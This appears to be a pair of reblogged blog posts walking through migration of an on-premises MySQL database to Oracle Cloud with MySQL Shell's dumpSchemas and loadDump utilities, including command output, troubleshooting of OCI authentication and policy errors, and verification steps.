On-Premises Instance Details: Database Name: CustomerDB; IP: 192.168.1.10; User: root; Port: 3306; DB Size ~ 1.4 GB; No of Tables: 800
Oracle Cloud Compute Instance Details: Public IP Address: 140.238.227.xx; SSH ppk file; User: opc
MDS Details: MDS Private IP Address: 10.0.0.xx; MySQL Username: admin; MySQL Port: 3306
Command to export the backup from on-premises to OCI Object Storage
Open MySQL Shell, connect to the on-premises MySQL instance and then execute the commands below.
MySQL  JS > shell.connect("root@localhost");
Creating a session to 'root@localhost'
Fetching schema names for autocompletion... Press ^C to stop.
Your MySQL connection id is 28 (X protocol)
Server version: 8.0.21-commercial MySQL Enterprise Server - Commercial
No default schema selected; type use to set one.
MySQL  localhost:33060+ ssl  JS >py Check for Compatibility issues and gather the problems in advance before migration by using DRYRUN MySQL  localhost:33060+ ssl  JS > util.dumpSchemas(["CustomerDB"], "CustomerDBdump", {dryRun: true, ocimds: true})   O/P MySQL  localhost:33060+ ssl  JS > util.dumpSchemas(["CustomerDB"], "CustomerDBdump", {dryRun: true, ocimds: true}) Checking for compatibility with MySQL Database Service 8.0.21 NOTE: Database CustomerDB had unsupported ENCRYPTION option commented out ERROR: Function CustomerDB.fn_emailcheck - definition uses DEFINER clause set to user `abc`@`` which can only be executed by this user or a user with SET_USER_ID or SUPER privileges ERROR: Function fn_stockopengapup - definition uses DEFINER clause set to user `abc`@`` which can only be executed by this user or a user with SET_USER_ID or SUPER privileges ERROR: Trigger CustomerDB.DATA_ID - definition uses DEFINER clause set to user ` abc `@`` which can only be executed by this user or a user with SET_USER_ID or SUPER privileges ERROR: Procedure sp_checkUserComplaince - definition uses DEFINER clause set to user `abc`@`` which can only be executed by this user or a user with SET_USER_ID or SUPER privileges ERROR: View CustomerDB.performanceInfo - definition uses DEFINER clause set to user `abc`@`` which can only be executed by this user or a user with SET_USER_ID or SUPER privileges Compatibility issues with MySQL Database Service 8.0.21 were found. Please use the 'compatibility' option to apply compatibility adaptations to the dumped DDL. Util.dumpSchemas: Compatibility issues were found (RuntimeError)  MySQL  localhost:33060+ ssl  JS >   FIX:- No action from you , just use  “"compatibility": ["strip_definers", "strip_restricted_grants"]}” option Step#01  CODE to Export from On-P to Object Storage MySQL  localhost:33060+ ssl  JS > util.dumpSchemas(["CustomerDB"],"CustomerDBdump",{threads:30,"osBucketName": "chandanBucket", "osNamespace": "idazzjlcjqzj",  "ocimds": "true","ociConfigFile":"/root/.oci/config", "compatibility": ["strip_definers", "strip_restricted_grants"]}) Output Step#02  CODE to Import from  Object Storage to MySQL Database Service For import into a MySQL DB Service (MDS), the MySQL Shell instance where you run the dump loading utility must be installed on an Oracle Cloud Infrastructure Compute instance that has access to the MySQL DB System. Let’s connect Oracle Cloud Compute Instance ,a nd check whether MDS Instance you are able to connect or not ? How to connect Compute Instance- open Putty and Public IP into it , see below screen shot. How to Deploy MDS Instance ? Below is my another blog which will help us to get through. https://mysqlsolutionsarchitect.blogspot.com/2020/09/how-to-launch-mysql-database-service.html Let’s Connect MDS instance , sudo su root mysqlsh -h10.0.0.13 -uadmin -pXXXXXX DRY RUN scripts:- MySQL  localhost:33060+ ssl  JS > util.loadDump("CustomerDBdump",{dryRun: true, osBucketName: "chandanBucket", osNamespace: "idazzjlcjqzj","ociConfigFile":"/root/.oci/config"}) Suppose I wanted to push to MDS instance , so for that you needed to connect first with MySQL Shell, then execute LoadDump commands, make sure OCI CLI is installed over here. Code to Import into MDS util.loadDump("CustomerDBDump", {threads: 60, osBucketName: "chandanBucket", osNamespace: "idazzjlcjqzj","ociConfigFile":"/root/.oci/config" }) Finally Import Has been done successfully. Let’s Verify The results:-  Connect to MDS and check whether customerDB database has been migrated or not? 
On-Premises Database:- List of Errors and fixes during whole migration Exercise. Error#01:- Traceback (most recent call last):   File "", line 1, in SystemError: RuntimeError: Util.dump_schemas: Cannot open file: /root/.oci/config.   Fix:- Install OCI CLI in your local machine Installing the CLI (document available on D:ChandanCloudOCI_Notes) https://docs.cloud.oracle.com/en-us/iaas/Content/API/SDKDocs/cliinstall.htm     Error:#02- MySQL  localhost:33060+ ssl  JS util.dumpSchemas(["CustomerDB"], "CustomerDBdump", {"osBucketName": "chandanBucket", "osNamespace": "idazzjlcjqzj",  "ocimds": "true","ociConfigFile":"/root/.oci/config", "compatibility": ["strip_definers", "strip_restricted_grants"]}) Util.dumpSchemas: Failed to get object list using prefix 'CustomerDBdump/': Either the bucket named 'chandanBucket' does not exist in the namespace 'idazzjlcjqzj' or you are not authorized to access it (404) (RuntimeError)  MySQL  localhost:33060+ ssl  JS >  Fix:- look for connectivity from OnP to Oracle cloud object storage, below links will be helpfulhttps://docs.cloud.oracle.com/en-us/iaas/Content/API/SDKDocs/cliinstall.htm #oci os ns get Error#03 MySQL  localhost:33060+ ssl  Py util.dumpSchemas(["CustomerDB"], "CustomerDBdump", {"osBucketName": "chandanBucket", "osNamespace": "idazzjlcjqzj",  "ocimds": "true","ociConfigFile":"/root/.oci/config", "compatibility": ["strip_definers", "strip_restricted_grants"]}) Traceback (most recent call last):   File "", line 1, in SystemError: RuntimeError: Util.dump_schemas: Failed to list multipart uploads: Either the bucket named 'chandanBucket' does not exist in the namespace 'idazzjlcjqzj' or you are not authorized to access it (404) Fix:- make sure you have set policies Allow group chandangroup to read buckets in compartment chandankumar-sandbox Allow group chandangroup to manage objects in compartment chandankumar-sandbox where any {request.permission='OBJECT_CREATE', request.permission='OBJECT_INSPECT'} Allow group chandangroup to read objects in compartment chandankumar-sandbox Error#04   MySQL  localhost:33060+ ssl  JS > util.dumpSchemas(["CustomerDB"], "CustomerDBdump", {"osBucketName": "chandanBucket", "osNamespace": "idazzjlcjqzj",  "ocimds": "true","ociConfigFile":"/root/.oci/config", "compatibility": ["strip_definers", "strip_restricted_grants"]}) Checking for compatibility with MySQL Database Service 8.0.21 NOTE: Database sales had unsupported ENCRYPTION option commented out Compatibility issues with MySQL Database Service 8.0.21 were found and repaired. Please review the changes made before loading them. Acquiring global read lock All transactions have been started Locking instance for backup Global read lock has been released Writing global DDL files Preparing data dump for table `sales`.`employee` Writing DDL for schema `sales` Writing DDL for table `sales`.`employee` WARNING: Could not select a column to be used as an index for table `sales`.`employee`. Chunking has been disabled for this table, data will be dumped to a single file. Running data dump using 4 threads. NOTE: Progress information uses estimated values and may not be accurate. 
Data dump for table `sales`.`employee` will be written to 1 file ERROR: [Worker001]: Failed to rename object 'worlddump/[email protected]' to 'worlddump/[email protected]': Either the bucket named 'BootcampBucket' does not exist in the namespace 'idazzjlcjqzj' or you are not authorized to access it (404) Util.dumpSchemas: Fatal error during dump (RuntimeError) FixMake sure you have given Rename Permission/policies to objects  Allow group chandangroup to manage objects in compartment chandankumar-sandbox where any {request.permission='OBJECT_CREATE', request.permission='OBJECT_INSPECT', request.permission='OBJECT_OVERWRITE',request.permission='OBJECT_DELETE'} Final Policies:-  Error#06 Fix:- Re-login with root user:- sudo su root mysqlsh -h10.0.0.13 -uadmin -p   Conclusion:- Migration happened successfully!!! MySQL Database Service is a fully managed database service that enables organizations to deploy cloud-native applications using the world's most popular open source database. It is 100% developed, managed and supported by the MySQL Team. MySQL Shell 8.0.21 makes MySQL easier to use, by providing an interactive MySQL client supporting SQL, Document Store, JavaScript & Python interface with support for writing custom extensions. https://mysqlsolutionsarchitect.blogspot.com/2020/09/how-to-migrate-on-premises-mysql.html
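A quick way to double-check the verification step described above from the MDS endpoint (a small sketch; the private IP and schema name are the ones used in this walkthrough, and the table count should match the 800 tables noted in the source details):
MySQL  10.0.0.13:3306 ssl  SQL > SHOW DATABASES LIKE 'CustomerDB';
MySQL  10.0.0.13:3306 ssl  SQL > SELECT COUNT(*) FROM information_schema.tables WHERE table_schema = 'CustomerDB';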
0 notes
globalmediacampaign · 5 years ago
Text
How to Migrate On-premises MySQL Enterprise Database to OCI Compute Instance MySQL Enterprise Database ?
Migrating an on-premises MySQL Enterprise database to a MySQL Enterprise database on an OCI compute instance. In this post, we will walk through the steps needed to migrate a particular database (example: the Sales database) from a local (on-premises) instance to an Oracle Cloud Infrastructure compute instance.
We will use two new features introduced with the latest release of MySQL Shell 8.0.21:
1. Dump Schema utility — this will help us take the backup from the on-premises database and export it to Oracle Cloud Object Storage.
2. Load Dump utility — this will help us import the schema from Object Storage onto the compute instance.
More info: https://dev.mysql.com/doc/mysql-shell/8.0/en/mysql-shell-utilities-dump-instance-schema.html
How does the migration work?
Suppose you want to lift-and-shift a database called “sales”: the Schema Dump utility will export the sales database from on-premises to OCI (Oracle Cloud Infrastructure) Object Storage. Then the Load Dump utility will import it directly into the MySQL instance running on the OCI compute instance. I have made the diagram below for clear understanding…
What do we need handy?
1. MySQL Shell 8.0.21.
2. On-premises MySQL up and running.
3. Cloud instance up and running.
4. OCI CLI installed on the on-premises machine.
5. OCI CLI installed on the OCI (Oracle Cloud) compute instance.
6. The local_infile variable must be ON on the destination machine.
Additional Details
On-Premises Instance Details: Database Name: Sales; IP: 192.168.1.10; User: root; Port: 3306
Oracle Cloud Compute Instance Details: Public IP Address: 140.238.227.33; MySQL Username: admin; MySQL Port: 3306; MySQL Host: 127.0.0.1
Command to export the backup from on-premises to OCI Object Storage
MySQL  localhost:33060+ ssl  Py >  util.dump_schemas(["sales"], "worlddump", {"osBucketName": "BootcampBucket", "osNamespace": "idazzjlcjqzj",  "ocimds": "true","ociConfigFile":"/root/.oci/config", "compatibility": ["strip_definers", "strip_restricted_grants"]})
Checking for compatibility with MySQL Database Service 8.0.21
NOTE: Database sales had unsupported ENCRYPTION option commented out
Compatibility issues with MySQL Database Service 8.0.21 were found and repaired. Please review the changes made before loading them.
Acquiring global read lock
All transactions have been started
Locking instance for backup
Global read lock has been released
Writing global DDL files
Preparing data dump for table `sales`.`employee`
Writing DDL for schema `sales`
Writing DDL for table `sales`.`employee`
Data dump for table `sales`.`employee` will be chunked using column `empid`
Running data dump using 4 threads.
NOTE: Progress information uses estimated values and may not be accurate.
Data dump for table `sales`.`employee` will be written to 1 file
1 thds dumping - 100% (2 rows / ~2 rows), 0.00 rows/s, 12.00 B/s uncompressed, 0.00 B/s compressed
Duration: 00:00:03s
Schemas dumped: 1
Tables dumped: 1
Uncompressed data size: 39 bytes
Compressed data size: 0 bytes
Compression ratio: 39.0
Rows written: 2
Bytes written: 0 bytes
Average uncompressed throughput: 10.61 B/s
Average compressed throughput: 0.00 B/s
MySQL  localhost:33060+ ssl  Py >
Import the dump file into the compute instance from OCI Object Storage
util.loadDump("worlddump", {threads: 8, osBucketName: "BootcampBucket", osNamespace: "idazzjlcjqzj","ociConfigFile":"/root/.oci/config" })
Verify the results
On-Premises Database:-
Conclusion: the migration happened successfully!!!
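Looking back at prerequisite 6 in the checklist, one thing worth verifying on the destination instance before running util.loadDump() is local_infile, since the dump loading utility relies on LOAD DATA LOCAL INFILE. A minimal sketch for the self-managed MySQL on the compute instance (the host and port are taken from the details above; on a managed service the variable is controlled through its configuration instead):
MySQL  127.0.0.1:3306 ssl  SQL > SHOW GLOBAL VARIABLES LIKE 'local_infile';
MySQL  127.0.0.1:3306 ssl  SQL > SET PERSIST local_infile = ON;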
MySQL Shell 8.0.21 makes MySQL easier to use, by providing an interactive MySQL client supporting SQL, Document Store, JavaScript & Python interface with support for writing custom extensions. And with dumpInstance(), dumpSchemas(), importTable() and loadDump()  MySQL Shell now provides powerful logical dump and load functionality. ===========Rough Notes========================================= So doing this Migration what are challenges has come? what are Error has occurred and most important how did you fix it up? Let's have a look for all Error one by one... Error#01:- Traceback (most recent call last):   File "", line 1, in SystemError: RuntimeError: Util.dump_schemas: Cannot open file: /root/.oci/config.  Fix:-  Install OCI CLI in your local machine Installing the CLI (document available on D:ChandanCloudOCI_Notes) https://docs.cloud.oracle.com/en-us/iaas/Content/API/SDKDocs/cliinstall.htm   Error:#02- MySQL  localhost:33060+ ssl  Py > util.dump_schemas(["sales"], "salesdump", {"osBucketName": "BootcampBucket", "osNamespace": "idazzjlcjqzj",  "ocimds": "true", "compatibility": ["strip_definers", "strip_restricted_grants"]}) Traceback (most recent call last):   File "", line 1, in SystemError: RuntimeError: Util.dump_schemas: Failed to get object list using prefix 'salesdump/': The required information to complete authentication was not provided. (401) Fix:-  util.dump_schemas(["sales"], "worlddump", {"osBucketName": "dumpbucket-2", "osNamespace": "idazzjlcjqzj",  "ocimds": "true", "compatibility": ["strip_definers", "strip_restricted_grants"]})  Note:- don’t change the name of worlddump. Error#03 MySQL  localhost:33060+ ssl  Py > util.dump_schemas(["sales"], "worlddump", {"osBucketName": "BootcampBucket", "osNamespace": "idazzjlcjqzj",  "ocimds": "true","ociConfigFile":"/root/.oci/config", "compatibility": ["strip_definers", "strip_restricted_grants"]}) Traceback (most recent call last):   File "", line 1, in SystemError: RuntimeError: Util.dump_schemas: Failed to list multipart uploads: Either the bucket named 'BootcampBucket' does not exist in the namespace 'idazzjlcjqzj' or you are not authorized to access it (404) Fix:- make sure you have set policies Allow group chandangroup to read buckets in compartment chandankumar-sandbox Allow group chandangroup to manage objects in compartment chandankumar-sandbox where any {request.permission='OBJECT_CREATE', request.permission='OBJECT_INSPECT'} Allow group chandangroup to read objects in compartment chandankumar-sandbox   Error#04    MySQL  localhost:33060+ ssl  JS > util.dumpSchemas(["sales"], "worlddump", {"osBucketName": "BootcampBucket", "osNamespace": "idazzjlcjqzj",  "ocimds": "true","ociConfigFile":"/root/.oci/config", "compatibility": ["strip_definers", "strip_restricted_grants"]}) Checking for compatibility with MySQL Database Service 8.0.21 NOTE: Database sales had unsupported ENCRYPTION option commented out Compatibility issues with MySQL Database Service 8.0.21 were found and repaired. Please review the changes made before loading them. Acquiring global read lock All transactions have been started Locking instance for backup Global read lock has been released Writing global DDL files Preparing data dump for table `sales`.`employee` Writing DDL for schema `sales` Writing DDL for table `sales`.`employee` WARNING: Could not select a column to be used as an index for table `sales`.`employee`. Chunking has been disabled for this table, data will be dumped to a single file. Running data dump using 4 threads. 
NOTE: Progress information uses estimated values and may not be accurate. Data dump for table `sales`.`employee` will be written to 1 file ERROR: [Worker001]: Failed to rename object 'worlddump/[email protected]' to 'worlddump/[email protected]': Either the bucket named 'BootcampBucket' does not exist in the namespace 'idazzjlcjqzj' or you are not authorized to access it (404) Util.dumpSchemas: Fatal error during dump (RuntimeError) Fix Make sure you have given Rename Permission/policies to objects   Allow group chandangroup to manage objects in compartment chandankumar-sandbox where any {request.permission='OBJECT_CREATE', request.permission='OBJECT_INSPECT', request.permission='OBJECT_OVERWRITE',request.permission='OBJECT_DELETE'} Final Policies:- go to OCI console --> Identity-->Policies--> add Policy Thank you for using MySQL!!! Please test and let us know your feedback... Share your feedback on improvement on my blog ,thank you! https://mysqlsolutionsarchitect.blogspot.com/2020/08/how-to-migrate-on-premises-mysql.html
0 notes